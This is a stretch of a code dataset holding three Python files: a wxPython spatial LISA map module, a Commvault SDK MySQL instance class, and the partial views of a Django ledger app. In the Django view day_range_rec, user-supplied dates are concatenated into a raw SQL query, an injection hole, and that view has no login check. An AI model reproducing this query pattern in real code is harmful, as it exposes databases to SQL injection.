dc.GetTextExtent(info_tip)\r\n dc.DrawText(info_tip, start_pos[0] + (bmpWidth - txt_w)/2, start_pos[1]+bmpHeight+2)\n \n # draw navigation arrows\n arrow_y = framePos[1] + bmpFrameHeight/2.0\n \n dc.SetFont(wx.Font(stars.NAV_ARROW_FONT_SIZE, wx.NORMAL, wx.NORMAL, wx.NORMAL))\n dc.SetBrush(wx.Brush(stars.STRIP_VIEW_NAV_BAR_BG_COLOR))\n dc.SetPen(wx.WHITE_PEN)\n if b2LeftArrow:\n self.nav_left = framePos[0], framePos[1], 20, self.bufferHeight/3.0\n dc.DrawRectangle(self.nav_left[0], self.nav_left[1], self.nav_left[2], self.nav_left[3])\n dc.SetPen(wx.WHITE_PEN)\n dc.DrawText(\"<<\", framePos[0]+3, arrow_y)\n else:\n self.nav_left = None\n \n if b2RightArrow:\n self.nav_right = framePos[0]+self.bufferWidth - 20,framePos[1], 20, self.bufferHeight/3.0\n dc.DrawRectangle(self.nav_right[0], self.nav_right[1], self.nav_right[2], self.nav_right[3])\n dc.SetPen(wx.WHITE_PEN)\n dc.DrawText(\">>\", self.bufferWidth-15, arrow_y)\n else:\n self.nav_right = None\n \n def drawSubLISAMap(self, idx, bufferWidth, bufferHeight,bmp):\n \"\"\"\n Draw two relative LISa maps for current LISA map\n \"\"\"\n dc = wx.BufferedDC(None, bmp)\n dc.SetBrush(wx.WHITE_BRUSH)\n dc.SetPen(wx.TRANSPARENT_PEN)\n dc.DrawRectangle(0,0,bufferWidth,bufferHeight)\n \n if not \"Linux\" in stars.APP_PLATFORM:\n # not good drawing effect using GCDC in linux\r\n dc = wx.GCDC(dc)\n \n view = View2ScreenTransform(\n self.extent, \n bufferWidth, \n bufferHeight\n ) \n \n moran_local = self.space_moran_locals[idx]\n sigFlag = moran_local[2]\n clusterFlag = moran_local[3]\n lm_sig = np.array(sigFlag)\n lm_q = np.array(clusterFlag)\n id_groups = [[] for i in range(6)]\n # 0 not significant, 1 HH, 2 LL, 3 LH, 4 HL, 5 Neighborless\n for i,sig in enumerate(lm_sig):\n if sig > 0:\n id_groups[lm_q[i]].append(i)\n else:\n id_groups[0].append(i)\n \n from stars.visualization.maps.BaseMap import PolygonLayer\n draw_layer = PolygonLayer(self, self.layer, build_spatial_index=False)\n #edge_clr = wx.Colour(200,200,200, self.opaque)\n edge_clr = self.color_schema_dict[self.layer.name].edge_color\r\n draw_layer.set_edge_color(edge_clr)\n draw_layer.set_data_group(id_groups)\n draw_layer.set_fill_color_group(self.lisa_color_group)\n draw_layer.draw(dc, view) \n \n return bmp\n \n def OnRightUp(self,event):\n menu = wx.Menu()\n menu.Append(210, \"Select Neighbors\", \"\")\r\n menu.Append(211, \"Cancel Select Neighbors\", \"\")\r\n menu.Append(212, \"Toggle internal popup window\", \"\")\r\n #menu.Append(212, \"Show external popup time LISA\", \"\")\r\n \n menu.UpdateUI()\n menu.Bind(wx.EVT_MENU, self.select_by_weights, id=210)\r\n menu.Bind(wx.EVT_MENU, self.cancel_select_by_weights, id=211)\r\n menu.Bind(wx.EVT_MENU, self.showInternalPopupTimeLISA, id=212)\r\n #menu.Bind(wx.EVT_MENU, self.showExtPopupTimeLISA, id=212)\r\n self.PopupMenu(menu)\n \n event.Skip() \n \n \nclass LISASpaceTimeQueryDialog(DynamicLISAQueryDialog):\n \"\"\"\n Query Dialog for generating LISA Space Time Maps\n \"\"\"\n def Add_Customized_Controls(self):\n x2,y2 = 20, 350\n wx.StaticBox(\n self.panel, -1, \"LISA setting:\",pos=(x2,y2),size=(325,70))\n wx.StaticText(self.panel, -1, \"Weights file:\",pos =(x2+10,y2+30),size=(90,-1))\n self.txt_weight_path = wx.TextCtrl(\n self.panel, -1, \"\",pos=(x2+100,y2+30), size=(180,-1) )\n #open_bmp = wx.ArtProvider.GetBitmap(wx.ART_FILE_OPEN, wx.ART_TOOLBAR, (16,16))\n open_bmp = wx.BitmapFromImage(stars.OPEN_ICON_IMG)\n \n self.btn_weight_path = wx.BitmapButton(\n self.panel,-1, open_bmp, pos=(x2+292,y2+32), style=wx.NO_BORDER)\n \n self.Bind(wx.EVT_BUTTON, self.BrowseWeightFile, self.btn_weight_path)\n \n def ShowPopupMenu(self, event):\n \"\"\"\n popup menu for checklist box\n \"\"\"\n menu = wx.Menu()\r\n menu.Append(101, \"Select all transitions\", \"\")\r\n menu.Append(102, \"De-select all transitions\", \"\")\r\n menu.Bind(wx.EVT_MENU, self.EvtSelectAllCheckList, id=101)\r\n menu.Bind(wx.EVT_MENU, self.EvtDeselectAllCheckList, id=102)\r\n menu.UpdateUI()\r\n \n self.PopupMenu(menu)\r\n \n def EvtSelectAllCheckList(self, event):\n self.lm_labels = []\n checked_list = []\n for i in range(len(self.lm_filter_lables)):\n self.lb.SetSelection(i)\n self.lm_labels.append(i+1)\n checked_list.append(i)\n self.lb.SetChecked(checked_list)\n \n def EvtDeselectAllCheckList(self, event):\n for i in range(len(self.lm_filter_lables)):\n self.lb.SetSelection(i, False)\n self.lm_labels.append(i+1)\n self.lm_labels = []\n self.lb.SetChecked([])\n \n def EvtCheckListBox(self, event):\n index = event.GetSelection()\n label = self.lb.GetString(index)\n self.lb.SetSelection(index)\n \n if self.lm_labels.count(index+1):\n self.lm_labels.remove(index+1)\n else:\n self.lm_labels.append(index+1)\n \n def OnQuery(self,event):\n if self._check_time_itv_input() == False or\\\n self._check_weight_path() == False or\\\n self._check_space_input() == False:\n return\n self.current_selected = range(self.dbf.n_records)\n self._filter_by_query_field()\n self.query_date = None \n self._filter_by_date_interval()\n self._filter_by_tod()\n self.query_data = self.gen_date_by_step()\n if self.query_data == None or len(self.query_data) <= 1:\n self.ShowMsgBox(\"LISA Space Time Cluster Map requires at least 2 time intervals, please reselect step-by parameters.\")\n return\n # LISA layer (only one)\n lisa_layer = [self.background_shps[self.background_shp_idx]]\n gi_widget = DynamicMapWidget(\n self.parent,\n lisa_layer,\n LISASpaceTimeMap,\n weight=self.weight_path,\n query_data=self.query_data,\n size=(800,650),\n start= self._wxdate2pydate(self.itv_start_date.GetValue()),\n end= self._wxdate2pydate(self.itv_end_date.GetValue()),\n step_by=self.step_by,\n step=self.step+1\n )\n gi_widget.Show()\n \n # (enable) save LISA Markov to new shp/dbf files\n #self.btn_save.Enable(True)\n #self.lisa_layer = lisa_layer[0]\n #self.lisa_markov_map = gi_widget.map_canvas\n \n def OnSaveQueryToDBF(self, event):\n \"\"\"\n Save Markov type in each interval for each record to dbf file.\n \"\"\"\n if self.query_data == None:\n return\n \n dlg = wx.FileDialog(\n self, \n message=\"Save Markov LISA type to new dbf file...\", \n defaultDir=os.getcwd(), \n defaultFile='%s.shp' % (self.lisa_layer.name + '_markov_lisa'), \n wildcard=\"shape file (*.shp)|*.shp|All files (*.*)|*.*\", \n style=wx.SAVE\n )\n if dlg.ShowModal() != wx.ID_OK:\n return\n \n path = dlg.GetPath()\n dbf = self.lisa_layer.dbf\n try:\n n_intervals = self.lisa_markov_map.t -1\n n_objects = len(dbf)\n lisa_markov_mt = self.lisa_markov_map.lisa_markov_mt\n \n newDBF= pysal.open('%s.dbf'%path[:-4],'w')\n newDBF.header = []\n newDBF.field_spec = []\n for i in dbf.header:\n newDBF.header.append(i)\n for i in dbf.field_spec:\n newDBF.field_spec.append(i)\n \n for i in range(n_intervals):\n newDBF.header.append('MARKOV_ITV%d'%(i+1))\n newDBF.field_spec.append(('N',4,0))\n \n for i in range(n_objects): \n newRow = []\n newRow = [item for item in dbf[i][0]]\n for j in range(n_intervals):\n move_type = lisa_markov_mt[i][j]\n newRow.append(move_type)\n \n newDBF.write(newRow)\n newDBF.close()\n \n self.ShowMsgBox(\"Query results have been saved to new dbf file\",\n mtype='CAST Information',\n micon=wx.ICON_INFORMATION)\n except:\n self.ShowMsgBox(\"Saving query results to dbf file failed. Please check if the dbf file already exists.\")\n \n \ndef ShowLISASpaceTimeMap(self):\n # self is Main.py\n if not self.shapefiles or len(self.shapefiles) < 1:\n return\n shp_list = [shp.name for shp in self.shapefiles]\n dlg = wx.SingleChoiceDialog(\n self, \n 'Select a POINT or Polygon(with time field) shape file:', \n 'LISA Space Time Map', \n shp_list,\n wx.CHOICEDLG_STYLE)\n if dlg.ShowModal() == wx.ID_OK:\n idx = dlg.GetSelection()\n shp = self.shapefiles[idx]\n background_shapes = FilterShapeList(self.shapefiles, stars.SHP_POLYGON)\n if shp.shape_type == stars.SHP_POINT:\n # create Markov LISA from points\n gi_dlg = LISASpaceTimeQueryDialog(\n self,\"LISA Space Time:\" + shp.name,\n shp, \n background_shps=background_shapes,\n size=stars.DIALOG_SIZE_QUERY_MARKOV_LISA)\n gi_dlg.Show()\n elif shp.shape_type == stars.SHP_POLYGON:\n # bring up a dialog and let user select \n # the time field in POLYGON shape file\n dbf_field_list = shp.dbf.header \n timedlg = wx.MultiChoiceDialog(\n self, 'Select TIME fields to generate LISA Space Time map:', \n 'DBF fields view', \n dbf_field_list)\n if timedlg.ShowModal() == wx.ID_OK:\n selections = timedlg.GetSelections()\n # compose lisa_data_dict\n dbf = shp.dbf\n lisa_data_dict = {}\n count = 0\n for idx in selections:\n lisa_data_dict[count] = np.array(dbf.by_col(dbf.header[idx]))\n count += 1 \n # select weight file\n wdlg = wx.FileDialog(\n self, message=\"Select a weights file\",\n wildcard=\"Weights file (*.gal,*.gwt)|*.gal;*.gwt|All files (*.*)|*.*\",\n style=wx.OPEN | wx.CHANGE_DIR)\n if wdlg.ShowModal() == wx.ID_OK:\n # todo: select filter\n weight_path = wdlg.GetPath()\n # directly show Markov LISA Map\n gi_spacetime_widget= DynamicMapWidget(\n self, \n [shp], \n LISASpaceTimeMap,\n weight = weight_path,\n query_data = lisa_data_dict,\n size =stars.MAP_SIZE_MARKOV_LISA,\n start=1,\n end=count-1,\n step_by='',\n step=1)\n gi_spacetime_widget.Show()\n wdlg.Destroy()\n timedlg.Destroy()\n else:\n self.ShowMsgBox(\"File type error. Should be a POINT or POLYGON shapefile.\")\n dlg.Destroy()\n return\n dlg.Destroy() ","repo_name":"GeoDaCenter/CAST","sub_path":"stars/visualization/maps/LISASpaceTime.py","file_name":"LISASpaceTime.py","file_ext":"py","file_size_in_byte":31294,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"21"} +{"seq_id":"34875519443","text":"from __future__ import unicode_literals\nfrom ..instance import Instance\nfrom ..exception import SDKException\n\n\nclass MYSQLInstance(Instance):\n \"\"\"\n Class to represent a standalone MYSQL Instance\n \"\"\"\n\n def __init__(self, agent_object, instance_name, instance_id=None):\n \"\"\"Initialise the Subclient object.\n\n Args:\n agent_object (object) -- instance of the Agent class\n\n instance_name (str) -- name of the instance\n\n instance_id (str) -- id of the instance\n\n default: None\n\n Returns:\n object - instance of the MYSQLInstance class\n\n \"\"\"\n self._browse_restore_json = None\n self._commonoption_restore_json = None\n self._destination_restore_json = None\n self._fileoption_restore_json = None\n self._instance = None\n self.admin_option_json = None\n self.mysql_restore_json = None\n super(MYSQLInstance, self).__init__(agent_object, instance_name, instance_id)\n\n @property\n def port(self):\n \"\"\"Returns the MySQL Server Port number.\n\n Returns:\n (str) -- MySql server port number\n\n \"\"\"\n return self._properties.get('mySqlInstance', {}).get('port', None)\n\n @property\n def mysql_username(self):\n \"\"\"Returns the MySQL Server username.\n\n Returns:\n (str) -- MySql server SA username\n\n \"\"\"\n return self._properties.get('mySqlInstance', {}).get('SAUser', {}).get('userName', None)\n\n @property\n def nt_username(self):\n \"\"\"Returns the MySQL Server nt username.\n\n Returns:\n (str) -- MySql server NT username\n\n \"\"\"\n return self._properties.get('mySqlInstance', {}).get('NTUser', {}).get('userName', None)\n\n @property\n def config_file(self):\n \"\"\"Returns the MySQL Server Config File location.\n\n Returns:\n (str) -- MySql server config file location\n\n \"\"\"\n return self._properties.get('mySqlInstance', {}).get('ConfigFile', None)\n\n @property\n def binary_directory(self):\n \"\"\"Returns the MySQL Server Binary File location.\n\n Returns:\n (str) -- MySql server binary directory\n\n \"\"\"\n return self._properties.get('mySqlInstance', {}).get('BinaryDirectory', None)\n\n @property\n def version(self):\n \"\"\"Returns the MySQL Server version number.\n\n Returns:\n (str) -- MySql server version\n\n \"\"\"\n return self._properties.get('mySqlInstance', {}).get('version', None)\n\n @property\n def log_data_directory(self):\n \"\"\"Returns the MySQL Server log data directory.\n\n Returns:\n (str) -- MySql server log directory path\n\n \"\"\"\n return self._properties.get('mySqlInstance', {}).get('LogDataDirectory', None)\n\n @property\n def log_backup_sp_details(self):\n \"\"\"Returns the MySQL Server Log backup SP details\n\n Returns:\n (dict) -- MySql server log backup storage policy information\n\n \"\"\"\n log_storage_policy_name = self._properties.get('mySqlInstance', {}).get(\n 'logStoragePolicy', {}).get('storagePolicyName', None)\n log_storage_policy_id = self._properties.get('mySqlInstance', {}).get(\n 'logStoragePolicy', {}).get('storagePolicyId', None)\n\n log_sp = {\"storagePolicyName\": log_storage_policy_name,\n \"storagePolicyId\": log_storage_policy_id}\n return log_sp\n\n @property\n def command_line_sp_details(self):\n \"\"\"Returns the MySQL Server commandline SP details.\n\n Returns:\n (dict) -- MySql server commnadline storage policy information\n\n \"\"\"\n cmd_storage_policy_name = self._properties.get('mySqlInstance', {}).get(\n 'mysqlStorageDevice', {}).get('commandLineStoragePolicy', {}).get(\n 'storagePolicyName', None)\n cmd_storage_policy_id = self._properties.get('mySqlInstance', {}).get(\n 'mysqlStorageDevice', {}).get('commandLineStoragePolicy', {}).get(\n 'storagePolicyId', None)\n\n command_sp = {\"storagePolicyName\": cmd_storage_policy_name,\n \"storagePolicyId\": cmd_storage_policy_id}\n return command_sp\n\n @property\n def autodiscovery_enabled(self):\n \"\"\"Returns the MySQL Server auto discovery enabled flag\n\n Returns:\n (bool) -- True if auto discovery enabled\n False if auto discovery not enabled\n\n \"\"\"\n return self._properties.get('mySqlInstance', {}).get('EnableAutoDiscovery', False)\n\n @property\n def xtrabackup_bin_path(self):\n \"\"\"Returns the MySQL Server xtrabackup bin path\n\n Returns:\n (str) -- MySql server xtrabackup binary path\n\n \"\"\"\n return self._properties.get(\n 'mySqlInstance', {}).get(\n 'xtraBackupSettings', {}).get('xtraBackupBinPath', \"\")\n\n @property\n def is_xtrabackup_enabled(self):\n \"\"\"Returns the MySQL Server xtrabackup enabled flag\n\n Returns:\n (bool) -- True if xtrabackup is enabled\n False if xtrabackup is not enabled\n\n \"\"\"\n return self._properties.get(\n 'mySqlInstance', {}).get(\n 'xtraBackupSettings', {}).get('enableXtraBackup', False)\n\n @property\n def proxy_options(self):\n \"\"\"Returns the MySQL Server proxy options\n\n Returns:\n (dict) -- MySql server proxy information\n\n \"\"\"\n proxy_settings = self._properties.get('mySqlInstance', {}).get('proxySettings', {})\n proxy_opt = {\n \"isUseSSL\": proxy_settings.get('isUseSSL', False),\n \"isProxyEnabled\": proxy_settings.get('isProxyEnabled', False),\n \"runBackupOnProxy\": proxy_settings.get('runBackupOnProxy', False),\n \"instanceId\": proxy_settings.get('proxyInstance', {}).get('instanceId', None),\n \"instanceName\": proxy_settings.get('proxyInstance', {}).get('instanceName', None),\n \"clientId\": proxy_settings.get('proxyInstance', {}).get('clientId', None),\n \"clientName\": proxy_settings.get('proxyInstance', {}).get('clientName', None)}\n return proxy_opt\n\n @property\n def mysql_enterprise_backup_binary_path(self):\n \"\"\" Returns the MySQL Enterprise backup binary path detail\n\n Return Type: dict\n\n \"\"\"\n meb_settings = self._properties.get('mySqlInstance', {}).get('mebSettings', {})\n return meb_settings\n\n @mysql_enterprise_backup_binary_path.setter\n def mysql_enterprise_backup_binary_path(self, value):\n \"\"\" Setter for MySQL Enterprise backup binary path\n\n Args:\n\n value (str) -- Contains the MySQL Enterprise backup binary path to be updated\n in MySQL Instance property\n\n \"\"\"\n if not isinstance(value, str):\n raise SDKException('Instance', '101')\n properties = self._properties\n meb_bin_path_update = {\n \"enableMEB\": False if value == '' else True,\n \"mebBinPath\": value\n }\n properties['mySqlInstance']['mebSettings'] = meb_bin_path_update\n self.update_properties(properties)\n\n @property\n def no_lock_status(self):\n \"\"\" Returns the status of No Lock Checkbox in MySQL Instance\n\n Returns:\n (bool) -- True if No Lock checkbox is enabled\n False if No Lock checkbox is disabled\n\n \"\"\"\n return self._properties.get('mySqlInstance', {}).get('EnableNoLocking', False)\n\n @no_lock_status.setter\n def no_lock_status(self, value):\n \"\"\" Setter for No Lock property in MySQL Instance\n\n Args:\n\n value (bool) -- True or False to enable or disable the No Lock\n property in MySQL Instance\n\n \"\"\"\n if not isinstance(value, bool):\n raise SDKException('Instance', '101')\n properties = self._properties\n properties['mySqlInstance']['EnableNoLocking'] = value\n self.update_properties(properties)\n\n @property\n def ssl_enabled(self):\n \"\"\" Returns(boolean) True/False based on SSL status \"\"\"\n return self._properties.get('mySqlInstance', {}).get('sslEnabled', False)\n\n def _get_instance_properties(self):\n \"\"\"Gets the properties of this instance.\n\n Raises:\n SDKException:\n if response is empty\n\n if response is not success\n\n \"\"\"\n super(MYSQLInstance, self)._get_instance_properties()\n self._instance = {\n \"type\": 0,\n \"clientName\": self._agent_object._client_object.client_name,\n \"clientSidePackage\": True,\n \"subclientName\": \"\",\n \"backupsetName\": \"defaultDummyBackupSet\",\n \"instanceName\": self.instance_name,\n \"appName\": self._agent_object.agent_name,\n \"consumeLicense\": True\n }\n\n def _restore_json(self, **kwargs):\n \"\"\"Returns the JSON request to pass to the API as per the options selected by the user.\n\n Args:\n kwargs (list) -- list of options need to be set for restore\n\n Returns:\n dict - JSON request to pass to the API\n\n \"\"\"\n rest_json = super(MYSQLInstance, self)._restore_json(**kwargs)\n restore_option = {}\n if kwargs.get(\"restore_option\"):\n restore_option = kwargs[\"restore_option\"]\n for key in kwargs:\n if not key == \"restore_option\":\n restore_option[key] = kwargs[key]\n else:\n restore_option.update(kwargs)\n\n if restore_option[\"from_time\"] is None:\n restore_option[\"from_time\"] = {}\n\n if restore_option[\"to_time\"] is None:\n restore_option[\"to_time\"] = {}\n\n self._restore_admin_option_json(restore_option)\n self._restore_mysql_option_json(restore_option)\n rest_json[\"taskInfo\"][\"subTasks\"][0][\"options\"][\"restoreOptions\"][\n \"mySqlRstOption\"] = self.mysql_restore_json\n rest_json[\"taskInfo\"][\"subTasks\"][0][\"options\"][\"adminOpts\"] = self.admin_option_json\n return rest_json\n\n def restore_in_place(\n self,\n path=None,\n staging=None,\n dest_client_name=None,\n dest_instance_name=None,\n data_restore=True,\n log_restore=False,\n overwrite=True,\n copy_precedence=None,\n from_time=None,\n to_time=None,\n media_agent=None,\n table_level_restore=False,\n clone_env=False,\n clone_options=None,\n redirect_enabled=False,\n redirect_path=None,\n browse_jobid=None):\n \"\"\"Restores the mysql data/log files specified in the input paths list to the same location.\n\n Args:\n path (list) -- list of database/databases to be restored\n\n default: None\n\n staging (str) -- staging location for mysql logs during restores\n\n default: None\n\n dest_client_name (str) -- destination client name where files are to be\n restored\n\n default: None\n\n dest_instance_name (str) -- destination mysql instance name of destination\n client\n\n default: None\n\n data_restore (bool) -- for data only/data+log restore\n\n default: True\n\n log_restore (bool) -- for log only/data+log restore\n\n default: False\n\n overwrite (bool) -- unconditional overwrite files during restore\n\n default: True\n\n copy_precedence (int) -- copy precedence value of storage policy copy\n\n default: None\n\n from_time (str) -- time to retore the contents after\n format: YYYY-MM-DD HH:MM:SS\n\n default: None\n\n to_time (str) -- time to retore the contents before\n format: YYYY-MM-DD HH:MM:SS\n\n default: None\n\n media_agent (str) -- media agent associated\n\n default: None\n\n table_level_restore (bool) -- Table level restore flag\n\n default: False\n\n clone_env (bool) -- boolean to specify whether the database\n should be cloned or not\n\n default: False\n\n clone_options (dict) -- clone restore options passed in a dict\n\n default: None\n\n Accepted format: {\n \"stagingLocaion\": \"/gk_snap\",\n \"forceCleanup\": True,\n \"port\": \"5595\",\n \"libDirectory\": \"\",\n \"isInstanceSelected\": True,\n \"reservationPeriodS\": 3600,\n \"user\": \"\",\n \"binaryDirectory\": \"/usr/bin\"\n\n }\n\n redirect_enabled (bool) -- boolean to specify if redirect restore is\n enabled\n\n default: False\n\n redirect_path (str) -- Path specified in advanced restore options\n in order to perform redirect restore\n\n default: None\n\n browse_jobid (int) -- Browse jobid to browse and restore from\n\n default: None\n\n Returns:\n object - instance of the Job class for this restore job\n\n Raises:\n SDKException:\n if paths is not a list\n\n if failed to initialize job\n\n if response is empty\n\n if response is not success\n\n \"\"\"\n if not (isinstance(path, list) and\n isinstance(overwrite, bool)):\n raise SDKException('Instance', '101')\n\n if path == []:\n raise SDKException('Instance', '104')\n\n if dest_client_name is None:\n dest_client_name = self._agent_object._client_object.client_name\n\n if dest_instance_name is None:\n dest_instance_name = self.instance_name\n\n request_json = self._restore_json(\n paths=path,\n staging=staging,\n dest_client_name=dest_client_name,\n dest_instance_name=dest_instance_name,\n data_restore=data_restore,\n log_restore=log_restore,\n overwrite=overwrite,\n copy_precedence=copy_precedence,\n from_time=from_time,\n to_time=to_time,\n media_agent=media_agent,\n table_level_restore=table_level_restore,\n clone_env=clone_env,\n clone_options=clone_options,\n redirect_enabled=redirect_enabled,\n redirect_path=redirect_path,\n browse_jobid=browse_jobid)\n\n return self._process_restore_response(request_json)\n\n def _restore_browse_option_json(self, value):\n \"\"\"setter for the Browse options for restore in Json\"\"\"\n\n if not isinstance(value, dict):\n raise SDKException('Instance', '101')\n super(MYSQLInstance, self)._restore_browse_option_json(value)\n self._browse_restore_json['backupset'] = {\n \"clientName\": self._agent_object._client_object.client_name,\n \"backupsetName\": \"defaultDummyBackupSet\"\n }\n\n if value.get(\"browse_jobid\"):\n self._browse_restore_json['browseJobId'] = value.get(\"browse_jobid\")\n\n if value.get(\"from_time\") and value.get(\"to_time\"):\n self._browse_restore_json[\"timeRange\"] = {\"fromTime\" : value.get(\"from_time\"),\n \"toTime\" : value.get(\"to_time\")}\n\n def _restore_common_options_json(self, value):\n \"\"\"setter for the Common options in restore JSON\"\"\"\n\n if not isinstance(value, dict):\n raise SDKException('Instance', '101')\n\n self._commonoption_restore_json = {\n \"restoreToDisk\": False,\n \"onePassRestore\": False,\n \"revert\": False,\n \"syncRestore\": False\n }\n\n def _restore_destination_json(self, value):\n \"\"\"setter for the MySQL Destination options in restore JSON\"\"\"\n\n if not isinstance(value, dict):\n raise SDKException('Instance', '101')\n\n self._destination_restore_json = {\n \"destinationInstance\": {\n \"clientName\": value.get(\"dest_client_name\", \"\"),\n \"instanceName\": value.get(\"dest_instance_name\", \"\"),\n \"appName\": \"MySQL\"\n },\n \"destClient\": {\n \"clientName\": value.get(\"dest_client_name\", \"\")\n }\n }\n\n def _restore_fileoption_json(self, value):\n \"\"\"setter for the fileoption restore option in restore JSON\"\"\"\n\n if not isinstance(value, dict):\n raise SDKException('Instance', '101')\n\n self._fileoption_restore_json = {\n \"sourceItem\": value.get(\"paths\", [])\n }\n\n def _restore_admin_option_json(self, value):\n \"\"\"setter for the admin restore option in restore JSON\"\"\"\n\n if not isinstance(value, dict):\n raise SDKException('Instance', '101')\n\n self.admin_option_json = {\n \"contentIndexingOption\": {\n \"subClientBasedAnalytics\": False\n }\n }\n\n def _restore_mysql_option_json(self, value):\n \"\"\"setter for the mysql restore option in restore JSON\"\"\"\n\n if not isinstance(value, dict):\n raise SDKException('Instance', '101')\n\n self.mysql_restore_json = {\n \"destinationFolder\": \"\",\n \"data\": value.get(\"data_restore\", True),\n \"log\": value.get(\"log_restore\", True),\n \"recurringRestore\": False,\n \"temporaryStagingLocation\": value.get(\"staging\", \"\"),\n \"dataStagingLocation\": \"\",\n \"logRestoreType\": 0,\n \"tableLevelRestore\": value.get(\"table_level_restore\", False),\n \"pointofTime\": True if value.get(\"to_time\") else False,\n \"instanceRestore\": True,\n \"isCloneRestore\": value.get(\"clone_env\", False),\n \"fromTime\": value.get(\"from_time\", {}),\n \"refTime\": value.get(\"to_time\", {}),\n \"destinationServer\": {\n \"name\": \"\"\n }\n }\n if value.get(\"table_level_restore\"):\n self.mysql_restore_json['dropTable'] = True\n self.mysql_restore_json['instanceRestore'] = False\n\n if value.get(\"clone_env\", False):\n self.mysql_restore_json[\"cloneOptions\"] = value.get(\"clone_options\", \"\")\n\n if value.get(\"redirect_path\"):\n self.mysql_restore_json[\"redirectEnabled\"] = True\n self.mysql_restore_json[\"redirectItems\"] = [value.get(\"redirect_path\")]\n\n if value.get(\"from_time\"):\n self.mysql_restore_json[\"fromTime\"] = {\"time\" : value.get(\"to_time\")}\n\n if value.get(\"to_time\"):\n self.mysql_restore_json[\"refTime\"] = {\"time\" : value.get(\"to_time\")}\n\n if value.get(\"to_time\"):\n self.mysql_restore_json[\"pointInTime\"] = {\"time\" : value.get(\"to_time\")}\n\n if value.get(\"dest_instance_name\"):\n self.mysql_restore_json[\"destinationServer\"] = {\"name\": value.get(\n \"dest_instance_name\")}\n","repo_name":"Commvault/cvpysdk","sub_path":"cvpysdk/instances/mysqlinstance.py","file_name":"mysqlinstance.py","file_ext":"py","file_size_in_byte":20037,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"21"} +{"seq_id":"1997215190","text":"from django.shortcuts import render, redirect\r\nfrom django.contrib.auth.forms import AuthenticationForm\r\nfrom django.contrib.auth.models import User\r\nfrom django.db import IntegrityError\r\nfrom django.contrib.auth import login, logout, authenticate\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom .models import *\r\nfrom .forms import LedgerForm, DealerForm, RoadExpenseForm\r\nfrom .decorators import unauthenticated_user, allowed_users, admin_only\r\nfrom django.core.paginator import Paginator, EmptyPage\r\n\r\n# for current date displaying in netbal_pdf_view\r\nimport datetime\r\nfrom datetime import date, timedelta\r\n#for rendering pdf\r\nfrom django.http import HttpResponse\r\nfrom django.template.loader import get_template\r\nfrom xhtml2pdf import pisa\r\n#for image storage\r\nfrom django.core.files.storage import FileSystemStorage\r\n\r\n\r\n\r\n#function for rendering pdf of dealer report\r\n@login_required(login_url='loginuser')\r\n@allowed_users(allowed_roles=['admin'])\r\ndef netbal_pdf_view(request):\r\n template_path = 'ledger/netbalpdf.html'\r\n a = BrandNew.objects.all()\r\n size = len(a)\r\n today = date.today()\r\n d4 = today.strftime(\"%d-%b-%Y\")\r\n context = {'a':a,'size':size,'today':d4}\r\n # Create a Django response object, and specify content_type as pdf\r\n response = HttpResponse(content_type='application/pdf')\r\n #if direct download needed uncomment line below\r\n #response['Content-Disposition'] = 'attachment; filename=\"report.pdf\"'\r\n response['Content-Disposition'] = 'filename=\"report.pdf\"'\r\n # find the template and render it.\r\n template = get_template(template_path)\r\n html = template.render(context)\r\n\r\n # create a pdf\r\n pisa_status = pisa.CreatePDF(\r\n html, dest=response)\r\n # if error then show some funy view\r\n if pisa_status.err:\r\n return HttpResponse('We had some errors
' + html + '
')\r\n return response\r\n\r\n#function for rendering pdf of records in range of mentioned dates\r\n\r\n\r\ndef day_range_rec(request):\r\n if request.method == 'GET':\r\n return render(request,'ledger/dailytrans.html')\r\n\r\n else:\r\n template_path = 'ledger/day_range_rec.html'\r\n fromdate = request.POST.get('fromdate')\r\n todate = request.POST.get('todate')\r\n # To force selection of both the date fields\r\n if fromdate == \"\" or todate == \"\":\r\n context = {\"error\": \"Please select both the fields\"}\r\n return render(request,'ledger/dailytrans.html', context)\r\n\r\n # To ensure selected date range is valid\r\n today = date.today()\r\n d1 = today.strftime(\"%Y-%m-%d\")\r\n tomorrow = today + timedelta(1)\r\n d2 = tomorrow.strftime(\"%Y-%m-%d\")\r\n if fromdate>todate or fromdate>d1 or todate>d2:\r\n context = {\"error\": \"selected date range is invalid\"}\r\n return render(request,'ledger/dailytrans.html', context)\r\n\r\n ledgers = Ledger.objects.raw('select * from led where date between \"'+fromdate+'\" and \"'+todate+'\"')\r\n context = {'ledgers': ledgers, 'fromdate':fromdate, 'todate': todate}\r\n # Create a Django response object, and specify content_type as pdf\r\n response = HttpResponse(content_type='application/pdf')\r\n #if direct download needed uncomment line below\r\n #response['Content-Disposition'] = 'attachment; filename=\"report.pdf\"'\r\n response['Content-Disposition'] = 'filename=\"report.pdf\"'\r\n # find the template and render it.\r\n template = get_template(template_path)\r\n html = template.render(context)\r\n\r\n # create a pdf\r\n pisa_status = pisa.CreatePDF(\r\n html, dest=response)\r\n # if error then show some funy view\r\n if pisa_status.err:\r\n return HttpResponse('We had some errors
' + html + '
')\r\n return response\r\n\r\n\r\n#LEDGER\r\n@login_required(login_url='loginuser')\r\n@admin_only\r\ndef home(request):\r\n #this edit to solve the MultiValueDictKeyError\r\n query = request.POST.get('query', False)\r\n if query == \"\":\r\n return render(request, 'ledger/home.html')\r\n alldealers = Dealer.objects.filter(name__istartswith=query)\r\n context = {'alldealers':alldealers}\r\n return render(request, 'ledger/home.html', context)\r\n\r\n@login_required(login_url='loginuser')\r\n@allowed_users(allowed_roles=['admin', 'employee'])\r\ndef ledger(request, pk):\r\n dealer = Dealer.objects.get(id=pk)\r\n form = LedgerForm(initial={\"dealer\":dealer},instance=dealer)\r\n if request.method == 'GET':\r\n return render(request, 'ledger/ledger.html', {'form':form})\r\n else:\r\n form = LedgerForm(request.POST, request.FILES or None)\r\n\r\n if form.is_valid():\r\n form.save()\r\n # redirecting employee groups to their userpage and admins to the dealer page\r\n if request.user.groups.filter(name='admin'):\r\n return redirect('dealer', pk)\r\n else:\r\n return redirect('userpage')\r\n\r\n\r\n@login_required(login_url='loginuser')\r\n@allowed_users(allowed_roles=['admin'])\r\ndef dealer(request, pk):\r\n dealer = Dealer.objects.get(id=pk)\r\n ledgers = dealer.ledger_set.all()\r\n orderedledger = ledgers.order_by('-date')\r\n\r\n #paginating\r\n p = Paginator(orderedledger, 10)\r\n page_num = request.GET.get('page', 1)\r\n try:\r\n page = 